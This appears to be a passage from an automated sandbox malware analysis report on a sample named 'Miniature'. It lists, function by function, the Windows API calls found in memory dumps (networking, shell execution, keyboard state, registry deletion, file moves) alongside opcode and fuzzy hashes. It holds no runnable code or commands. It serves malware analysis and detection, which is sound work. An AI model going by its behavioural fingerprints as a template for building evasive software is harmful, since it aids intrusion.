                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: ce18ab8bb98d95067df9cf79621a7ee603b3dd8ecbd3a48575c711f97aea664e
                                                  • Instruction ID: 6463eb60d84cf9646d53dfce84a0111483715f781891656265d75508f16ec869
                                                  • Opcode Fuzzy Hash: ce18ab8bb98d95067df9cf79621a7ee603b3dd8ecbd3a48575c711f97aea664e
                                                  • Instruction Fuzzy Hash: A0C1BF716083459FD724EF24C881A6FB7E4BF85350F04492DF99A872A1DB34EC09EB82
                                                  APIs
                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 010072EB
                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0100730C
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0100731F
                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 010073D5
                                                  • inet_ntoa.WSOCK32(?), ref: 01007392
                                                    • Part of subcall function 00FEB4EA: _strlen.LIBCMT ref: 00FEB4F4
                                                    • Part of subcall function 00FEB4EA: _memmove.LIBCMT ref: 00FEB516
                                                  • _strlen.LIBCMT ref: 0100742F
                                                  • _memmove.LIBCMT ref: 01007498
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  • Opcode ID: cb964e0c754a5a3d0ba6a65c9a5d43dcff06993513608b6ab384ac5a8c18e9fe
                                                  • Instruction ID: 6f2b42095c3e77105bc77a47a7c0c8be6d3ba215486381a3bce892bcc5db2283
                                                  • Opcode Fuzzy Hash: cb964e0c754a5a3d0ba6a65c9a5d43dcff06993513608b6ab384ac5a8c18e9fe
                                                  • Instruction Fuzzy Hash: 9081B071504300ABE721EB24CC81E6FBBE8EF84714F158558F5959B2D2DB78E902CB92
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5f3838667f754ca3a4240e19ab6dd8682ff69b8f542427169c06916c627c451
                                                  • Instruction ID: 2e8c682244467cc56f620336219290b5547e57e858ac87bb59707be24c79a777
                                                  • Opcode Fuzzy Hash: f5f3838667f754ca3a4240e19ab6dd8682ff69b8f542427169c06916c627c451
                                                  • Instruction Fuzzy Hash: 42716E3590010AEFEF18CF98CC89EAE7B75FF85310F248159F965AA251C7349A51EFA0
                                                  APIs
                                                  • IsWindow.USER32(011B56B0), ref: 0101BA5D
                                                  • IsWindowEnabled.USER32(011B56B0), ref: 0101BA69
                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0101BB4D
                                                  • SendMessageW.USER32(011B56B0,000000B0,?,?), ref: 0101BB84
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0101BBC1
                                                  • GetWindowLongW.USER32(011B56B0,000000EC), ref: 0101BBE3
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0101BBFB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 0a2e5bdd615db38761871139961e70e659e675ce346c3e2928bf0d077ae641f8
                                                  • Instruction ID: decea5b1c7ae6194426e191dc62fe3335a20053e2f35a548cc13de977b540a6f
                                                  • Opcode Fuzzy Hash: 0a2e5bdd615db38761871139961e70e659e675ce346c3e2928bf0d077ae641f8
                                                  • Instruction Fuzzy Hash: 9271BC35600204AFEB719F58C8D4FBABBF9FF09301F544099EAC597259CB7AA840DB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 0100FB31
                                                  • _memset.LIBCMT ref: 0100FBFA
                                                  • ShellExecuteExW.SHELL32(?), ref: 0100FC3F
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                    • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                  • GetProcessId.KERNEL32(00000000), ref: 0100FCB6
                                                  • CloseHandle.KERNEL32(00000000), ref: 0100FCE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: 2856efacd5cd7a2c606d2dff93bba12d33eb82e5c6aae64d199f27aa2ec13fd9
                                                  • Instruction ID: 6113b8ea50fbd38bb4c1d157e8e137826ba4448cbcfde90fee4394bb80d9b714
                                                  • Opcode Fuzzy Hash: 2856efacd5cd7a2c606d2dff93bba12d33eb82e5c6aae64d199f27aa2ec13fd9
                                                  • Instruction Fuzzy Hash: 8361B074A00A199FDB21EF54C9919AEFBF4FF48314F148459E846AB391CB34AD42EF90
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00FF178B
                                                  • GetKeyboardState.USER32(?), ref: 00FF17A0
                                                  • SetKeyboardState.USER32(?), ref: 00FF1801
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FF182F
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FF184E
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FF1894
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FF18B7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 0bf5e013d0f329a69a0c2a6bc2a2f503156c518ec1bca803bfa1814fad4031cd
                                                  • Instruction ID: b736bf0d014f0dae40dad9f51a89a0105525df77eb6d10f8f4e0139efc6c5d45
                                                  • Opcode Fuzzy Hash: 0bf5e013d0f329a69a0c2a6bc2a2f503156c518ec1bca803bfa1814fad4031cd
                                                  • Instruction Fuzzy Hash: C151F561D087D9BDFB368634CC15BB67EE97F06310F088589E2D9558E2D2D8DC88E750
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00FF15A4
                                                  • GetKeyboardState.USER32(?), ref: 00FF15B9
                                                  • SetKeyboardState.USER32(?), ref: 00FF161A
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FF1646
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FF1663
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FF16A7
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FF16C8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: dfb5fb69eeeebea56426078028f1fa012451926b569d2771f67abd098208bab3
                                                  • Instruction ID: 3d883e3be9535e66d04667bcac93816238b63614c67afc2695663f881793d633
                                                  • Opcode Fuzzy Hash: dfb5fb69eeeebea56426078028f1fa012451926b569d2771f67abd098208bab3
                                                  • Instruction Fuzzy Hash: 0F5107A09047D9BDFB3287248C45B7A7EA97F06310F0C4589E2D9968E2C699EC84F750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: ede844bbcc1ead3c89be416fe45868b57d62f40df6ee68750a003a2c0ac735ba
                                                  • Instruction ID: 2f00fed1877405e2dcee25dcd2bdb1a9cbdf85d7353783cca57a08710db56739
                                                  • Opcode Fuzzy Hash: ede844bbcc1ead3c89be416fe45868b57d62f40df6ee68750a003a2c0ac735ba
                                                  • Instruction Fuzzy Hash: 4D41B266C5161875CB11FBB5CC469DFB3B8AF04310F508956F609E3122EB38E315DBA6
                                                  APIs
                                                    • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BE0
                                                    • Part of subcall function 00FF4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FF3B8A,?), ref: 00FF4BF9
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00FF3BAA
                                                  • _wcscmp.LIBCMT ref: 00FF3BC6
                                                  • MoveFileW.KERNEL32(?,?), ref: 00FF3BDE
                                                  • _wcscat.LIBCMT ref: 00FF3C26
                                                  • SHFileOperationW.SHELL32(?), ref: 00FF3C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 0f265e25fd0ca4fb62c97baab3d4ab30158a58d4dd5be642d40f6892111b9616
                                                  • Instruction ID: 8039a269d4a1f985a70fb12e1b99dcb4400e561ea962b8725f72aae2293bac15
                                                  • Opcode Fuzzy Hash: 0f265e25fd0ca4fb62c97baab3d4ab30158a58d4dd5be642d40f6892111b9616
                                                  • Instruction Fuzzy Hash: 8941A57150C3489AC751EF64C881AEFB7ECAF89350F50092EF689C3161EB38D688D752
                                                  APIs
                                                  • _memset.LIBCMT ref: 010178CF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017976
                                                  • IsMenu.USER32(?), ref: 0101798E
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010179D6
                                                  • DrawMenuBar.USER32 ref: 010179E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: fca86ce7ca20adf54e4a9525b48b132d10247fa5f250f348f423faeea23f6c4c
                                                  • Instruction ID: cfdb614a87516f21076505f569255e22fcdf3a26b2f279fa6727cce55c5f7e83
                                                  • Opcode Fuzzy Hash: fca86ce7ca20adf54e4a9525b48b132d10247fa5f250f348f423faeea23f6c4c
                                                  • Instruction Fuzzy Hash: 3A417B75A00308EFDB20DF58D884EAABBFAFF05310F048169F99597244C739A954CFA0
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01011631
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101165B
                                                  • FreeLibrary.KERNEL32(00000000), ref: 01011712
                                                    • Part of subcall function 01011602: RegCloseKey.ADVAPI32(?), ref: 01011678
                                                    • Part of subcall function 01011602: FreeLibrary.KERNEL32(?), ref: 010116CA
                                                    • Part of subcall function 01011602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010116ED
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 010116B5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 45b234abeb95ef1096e636eefdc03463b6e8a3019aaf10fb9c3dcffd2ecbdff6
                                                  • Instruction ID: eb3bc61c34a5af6a1312dc1dbf7d64d8787ee58c12d7e73770c8348a0cf7c101
                                                  • Opcode Fuzzy Hash: 45b234abeb95ef1096e636eefdc03463b6e8a3019aaf10fb9c3dcffd2ecbdff6
                                                  • Instruction Fuzzy Hash: 6B315271900209BFEB29CFA4D885EFFB7BCEF08300F1001A9F645E2244D7795A459BA4
                                                  APIs
                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 01016911
                                                  • GetWindowLongW.USER32(011B56B0,000000F0), ref: 01016944
                                                  • GetWindowLongW.USER32(011B56B0,000000F0), ref: 01016979
                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 010169AB
                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 010169D5
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 010169E6
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01016A00
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: f95a71a9b89631103bfe103fff790303719b42d6b7831fb6d28b612519404fa9
                                                  • Instruction ID: 89c4df7b051dc1d2ab32f90a347093a01f2b457c5067efd0c6d156a6473a14cd
                                                  • Opcode Fuzzy Hash: f95a71a9b89631103bfe103fff790303719b42d6b7831fb6d28b612519404fa9
                                                  • Instruction Fuzzy Hash: 94311A356402559FDB31CF1CDC84FA537EAEB4A710F2501A4F6958F2AACBBBA840DB50
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE2CA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE2F0
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00FEE2F3
                                                  • SysAllocString.OLEAUT32(?), ref: 00FEE311
                                                  • SysFreeString.OLEAUT32(?), ref: 00FEE31A
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00FEE33F
                                                  • SysAllocString.OLEAUT32(?), ref: 00FEE34D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: d40c6e48b9d3c331eb5db1fb6a36adb8b89f58d4edf23af16fbcbb63ee1b6946
                                                  • Instruction ID: b0e87c1590ca05435a7b45b489767cb587480a443431f5bcf9ebf398c4776864
                                                  • Opcode Fuzzy Hash: d40c6e48b9d3c331eb5db1fb6a36adb8b89f58d4edf23af16fbcbb63ee1b6946
                                                  • Instruction Fuzzy Hash: 4421D872A00209BF9F20DEA9DC88CBF77ACEB08360B148125F958DB254DA74EC459760
                                                  APIs
                                                    • Part of subcall function 01008475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010084A0
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010068B1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 010068C0
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 010068F9
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 01006902
                                                  • WSAGetLastError.WSOCK32 ref: 0100690C
                                                  • closesocket.WSOCK32(00000000), ref: 01006935
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0100694E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: 2023f8154a0d28018d9cef254a30ff05283e63fded2118cb085585ffdb01b0bc
                                                  • Instruction ID: 44bc63d6d4b0edfebe3dcb0f8580f73d9b574723f8d76db59f491cb5d73a5074
                                                  • Opcode Fuzzy Hash: 2023f8154a0d28018d9cef254a30ff05283e63fded2118cb085585ffdb01b0bc
                                                  • Instruction Fuzzy Hash: 3331D571600204AFEF219F64CC84FBE77EEEB44725F044169FD85A72C4CB79A9158BA1
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE3A5
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FEE3CB
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00FEE3CE
                                                  • SysAllocString.OLEAUT32 ref: 00FEE3EF
                                                  • SysFreeString.OLEAUT32 ref: 00FEE3F8
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00FEE412
                                                  • SysAllocString.OLEAUT32(?), ref: 00FEE420
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 409b76ecf6b48b02e040a263f8bd87b30df5f4b23d47f9e39fcb1ab1b9e104b9
                                                  • Instruction ID: 0ce1d2045cc10dc0dd2303317ba1d588a97107c1739162a0845acd35af404156
                                                  • Opcode Fuzzy Hash: 409b76ecf6b48b02e040a263f8bd87b30df5f4b23d47f9e39fcb1ab1b9e104b9
                                                  • Instruction Fuzzy Hash: 4D218876604244AFAB20DFA9EC88DBF77ECEB4C3607108125F945CB294DA75EC419B64
                                                  APIs
                                                    • Part of subcall function 00F92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                    • Part of subcall function 00F92111: GetStockObject.GDI32(00000011), ref: 00F92163
                                                    • Part of subcall function 00F92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01017C57
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01017C64
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 01017C6F
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01017C7E
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01017C8A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
